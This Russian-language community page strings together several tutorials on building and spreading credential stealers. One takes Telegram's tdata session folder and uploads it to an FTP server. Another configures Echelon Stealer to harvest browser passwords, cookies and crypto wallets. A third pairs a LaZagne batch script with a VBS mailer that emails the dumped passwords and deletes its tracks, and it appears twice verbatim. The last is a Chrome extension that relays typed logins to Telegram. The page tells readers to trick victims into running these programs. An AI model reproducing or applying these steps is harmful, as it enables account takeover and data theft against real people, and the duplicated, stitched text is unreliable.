Search the Community

Для начала снова быстренько пробежимся по общей информации. Суть стиллера заключается в том, что при запуске жертвой .exe файла, программа проверяет наличие на пк Telegram и, если находит его, то копирует папку "tdata" и отправляет хозяину программы на сервер. Для тех кто не знает, что это за папка и почему нам нужна именно она: при первом запуске Telegram на ПК у вас создается папка tdata, в которой хранится вся информация аккаунта, если злоумышленники украдут данную папку, то они смогут войти в аккаунт без смс подтверждения, ниже распишу об этом подробнее. Суть Установка VisualStudio Переходим по ссылочке и скачиваем Visual Studio 2019. Жмем "Скачать". После того как мы скачали студию, мы должны нажать на галочку

Проект Telegram создан Павлом Дуровым, основателем социальной сети «ВКонтакте». В интервью The New York Times Павел рассказал, что первоначальная идея приложения пришла ему ещё в 2011, когда к его двери приходили спецназовцы. Когда последние все-таки ушли, Дуров сразу же написал своему брату Николаю. Тогда же он и осознал, что у него нет безопасного способа коммуникации с братом. Сервис построен на технологии шифрования переписки MTProto, разработанной братом Павла — Николаем. Сам Telegram изначально был экспериментом принадлежащей Павлу компании Digital Fortress с целью протестировать MTProto на больших нагрузках. На данный момент Telegram пользуется большой популярностью, а количество пользователей мессенджера за год выросло на 33%, до 400 миллионов человек. Из-за своей популярности аккаунты пользователей Telegram становятся целью хакеров и злоумышленников. Но не каждый человек знает о том, как именно можно завладеть чужим аккаунтом. Именно поэтому в данной статье мы узнаем, как взломать аккаунт пользователя Telegram, используя стиллер. Установка и эксплуатация стиллера Стиллер — вредоносная программа, созданная для кражи паролей и куков с компьютера жертвы. Данный вредонос способен украсть активную сессию пользователя Telegram, чтобы атакующий спок войти в аккаунт, не используя СМС-подтверждение и облачный пароль. Для начала скачиваем данную програму по ссылке ниже: https://t.me/c/1187088162/173 После того, как мы скачали архив, распаковываем его и открываем файл с помощью редактора кода (например, Sublime Text). Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации. Теперь перед нами откроется окно, которое содержит в себе код стиллера. Нам необходимо создать свой FTP-сервер (можно на ucoz) и вписать все данные нашего сервера в код вредоносной программы. Далее нам нужно преобразовать наш файл в исполняемый. Для этого устанавливаем python на свой рабочий компьютер. После этого запускаем командную строку Windows и устанавливаем pyinstaller: pip install pyinstaller В командной строке переходим в папку, где находится наш вредоносный файл: cd c:\... И преобразуем стиллер в формат .exe с помощью команды: pyinstaller --onefile slealer.py Пару минут и наш файл будет готов. Далее отправляем его нашей жертве под любым предлогом заставляем запустить. После того, как наша жертва запустит вредоносный файл, стиллер отправит папку с куками активной сессии Telegram на наш FTP-сервер. Нам остается только импортировать данные куки в клиент мессенджера, чтобы войти в аккаунт жертвы.

Привет хакеры! Сегодня будем собирать свой стиллер из исходников Echelon Stealer v6. Функционал Браузеры: все браузеры на основе Chromium, все браузеры на основе Gecko (Mozilla) включая x32 и x64 версии, старые версии Edge и ie, рекурсивный сбор всех данных: пароли, история, авто-заполнение, cookies, cards, стилер криптокошельков - сессий и .dat файлов. Стиллер сессий: Discord, Telegram, Steam, FileZilla, Total Commander, Psi+, Pidgin и др. Граббер файлов: можно ограничить вес каждого файла, можно указать свои расширения для граббинга, по умолчанию собирает файлы с расширениями ".txt", ".doc", ".cs", ".json", ".suo", ".sql", рабочий стол и все подпапки, названия папок и их вложенность сохраняется как есть. Отправка лога осуществляется на: https://mega.nz Установка и настройка Устанавливаем Visual Studio, если еще не установлена. Качаем проект и открываем Echelon.sln, переходим к Program.cs. Настраиваем по скрину, не забывая ввести данные от mega.nz. Запускаем сборку обязательно на конфигурации Release! Для первого запуска проект нужно собрать как "Консольное приложение", чтобы убедиться в работоспособности. Если все нормально - собираем как "Приложение Windows". Собранный файл, уже скомпилированный, будет лежать в папке OUTPUT в корне проекта. Скачать Echelon Stealer v6. Внимание! Файл не проверен на вирусы! Осторожно! Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.

Всем привет, сегодня я вам расскажу, как собрать небольшой стиллер, выполнив всего лишь несколько простых пунктов. Наша программка будет отправлять всю вводимую информацию жертвы на вашу почту. Поэтому вооружаемся почтой и способом распространения стиллера и вперед! Начнем с того, что нам понадобится для его создания. Вот полный список: • LaZagne – программа, позволяющая восстанавливать пароли и позже записывать их в текстовый файл • Файл формата .bat который будет использовать для запуска вышеуказанной программы и указания директории хранения результатов • Скрипт VBS который понадобится для отправки письма на электронную почту • Конвертер VBS в EXE, однако, если хотите, то можете его и не использовать • Конвертер BAT в EXE 1.Нам необходимо создать файл формата .bat и записать туда эти строки: @Echo off laZagne.exe all > C:\install_error.bin TIMEOUT /T 2 sender.exe TIMEOUT /T 5 del /s "%UserProfile%\Downloads\laZagne.exe" del /s "%UserProfile%\Downloads\SENDER.exe" del /s "%UserProfile%\Desktop\laZagne.exe" del /s "%UserProfile%\Desktop\SENDER.exe" Строка “С:\install_error.bin” означает, что здесь будут храниться результаты, таймаут нужен для добавления ожидания при сохранении результата, обычно это около ста паролей в секунду. 2.Далее мы делаем обычный текстовый документ, там, где вам будет это удобно. После создания его нужно сохранить в виде .vbs файла. Туда нам нужно будет написать этот не самый большой код: Dim o_Mess, v_Conf v_Conf = "xttp://schemas.microsoft.com/cdo/configuration/" Set o_Mess = CreateObject ("CDO.Message") With o_Mess .To = "получатель@mail.com" 'место отправления .From = "Имя " 'Логин отправителя и его почта .Subject = "Log" название темы .TextBody = "BodyMail" письмо .AddAttachment "D:\install_error.bin" Прикрепление файла .TextBodyPart.Charset = "windows-1251" кодировка русских символов With .Configuration.Fields .Item(v_Conf & "sendusing") = 2 без использования каталога Server Exchange .Item(v_Conf & "smtpserver") = "smtp.mail.ru" Адрес SMTP-сервера .Item(v_Conf & "smtpauthenticate") = 1 Вид входа .Item(v_Conf & "sendusername") = "отправитель@mail.ru" логин человека .Item(v_Conf & "sendpassword") = "пароль отправителя" 'его пароль .Item(v_Conf & "smtpserverport") = 465 'порт (альтернативный - 465) .Item(v_Conf & "smtpusessl") = True использовать ли шифрованое подключение SSL .Item(v_Conf & "smtpconnectiontimeout") = 60 Время до завершения повторных попыток подключения .Update End With .send End With Set o_Mess = Nothing 3.Производим компиляцию всего этого месива с помощью конвертера из последнего пункта необходимых вещей. Как только вы это сделаете, просто сохраняете файл запуска и стартуете его. 4. Переходим на свою электронную почту и находим там письмо, которые было отправлено вашей программой. 5. Открываете файл с результатами в выбранной вами директории через любой текстовый редактор и собираете данные!

Привет хакерам, сейчас расскажу о написании стиллера на языку JS, который будет отправлять логи на телеграмм. Принцип работы стиллера: Жертва устанавливает расширение, после чего во время входа на сайт, стиллер отправляет все данные и строки ввода взломщику. Создаем manifest.json где будет находится имя, описание и версия стиллера: Если собираетесь установить фильтры для нужных сайтов, то меняем all_urls> на ссылки сайтов. Следующим пунктом является скачивание jquery.js, добавляя его в наше расширение. Далее создаем worker.js, где будет происходить кража данных из строчек для ввода, а также отправка логов в телеграмм. Для красоты можете добавить иконку формата .ico, возле необходимых файлов. Так выглядит готовая сборка стиллера: Отлично, далее запускаем браузер Chrome и устанавливаем наше расширение. Перед этим включаем режим разработчика. Переходим по этой ссылке – chrome://extensions/ Жмем кнопку “Загрузить распакованное расширение” после чего прокладываем путь к папке стиллера. Сразу можно увидеть установленное расширение: Все готово, проверяем. Допустим, заходим ВК и пишем в строки наш логин и пароль, кликаем “Войти” и сразу видим сообщение в телеге: Такое проворачивается с любыми доступными форумами, сайтами, социальными сетями и т.д. Удачи, хакер! Исходник – https://anonfile.com/D9K326t5nd/Chrome-Web-Inject-Extension-master_rar Оригинальный репозиторий - https://github.com/IceRed2K/Chrome-Web-Inject-Extension

Всем привет, сегодня я вам расскажу, как собрать небольшой стиллер, выполнив всего лишь несколько простых пунктов. Наша программка будет отправлять всю вводимую информацию жертвы на вашу почту. Поэтому вооружаемся почтой и способом распространения стиллера и вперед! Начнем с того, что нам понадобится для его создания. Вот полный список: • LaZagne – программа, позволяющая восстанавливать пароли и позже записывать их в текстовый файл • Файл формата .bat который будет использовать для запуска вышеуказанной программы и указания директории хранения результатов • Скрипт VBS который понадобится для отправки письма на электронную почту • Конвертер VBS в EXE, однако, если хотите, то можете его и не использовать • Конвертер BAT в EXE 1.Нам необходимо создать файл формата .bat и записать туда эти строки: @Echo off laZagne.exe all > C:\install_error.bin TIMEOUT /T 2 sender.exe TIMEOUT /T 5 del /s "%UserProfile%\Downloads\laZagne.exe" del /s "%UserProfile%\Downloads\SENDER.exe" del /s "%UserProfile%\Desktop\laZagne.exe" del /s "%UserProfile%\Desktop\SENDER.exe" Строка “С:\install_error.bin” означает, что здесь будут храниться результаты, таймаут нужен для добавления ожидания при сохранении результата, обычно это около ста паролей в секунду. 2.Далее мы делаем обычный текстовый документ, там, где вам будет это удобно. После создания его нужно сохранить в виде .vbs файла. Туда нам нужно будет написать этот не самый большой код: Dim o_Mess, v_Conf v_Conf = "xttp://schemas.microsoft.com/cdo/configuration/" Set o_Mess = CreateObject ("CDO.Message") With o_Mess .To = "получатель@mail.com" 'место отправления .From = "Имя " 'Логин отправителя и его почта .Subject = "Log" название темы .TextBody = "BodyMail" письмо .AddAttachment "D:\install_error.bin" Прикрепление файла .TextBodyPart.Charset = "windows-1251" кодировка русских символов With .Configuration.Fields .Item(v_Conf & "sendusing") = 2 без использования каталога Server Exchange .Item(v_Conf & "smtpserver") = "smtp.mail.ru" Адрес SMTP-сервера .Item(v_Conf & "smtpauthenticate") = 1 Вид входа .Item(v_Conf & "sendusername") = "отправитель@mail.ru" логин человека .Item(v_Conf & "sendpassword") = "пароль отправителя" 'его пароль .Item(v_Conf & "smtpserverport") = 465 'порт (альтернативный - 465) .Item(v_Conf & "smtpusessl") = True использовать ли шифрованое подключение SSL .Item(v_Conf & "smtpconnectiontimeout") = 60 Время до завершения повторных попыток подключения .Update End With .send End With Set o_Mess = Nothing 3.Производим компиляцию всего этого месива с помощью конвертера из последнего пункта необходимых вещей. Как только вы это сделаете, просто сохраняете файл запуска и стартуете его. 4. Переходим на свою электронную почту и находим там письмо, которые было отправлено вашей программой. 5. Открываете файл с результатами в выбранной вами директории через любой текстовый редактор и собираете данные! Я никого ни к чему не призываю, статья написана в ознакомительных целях!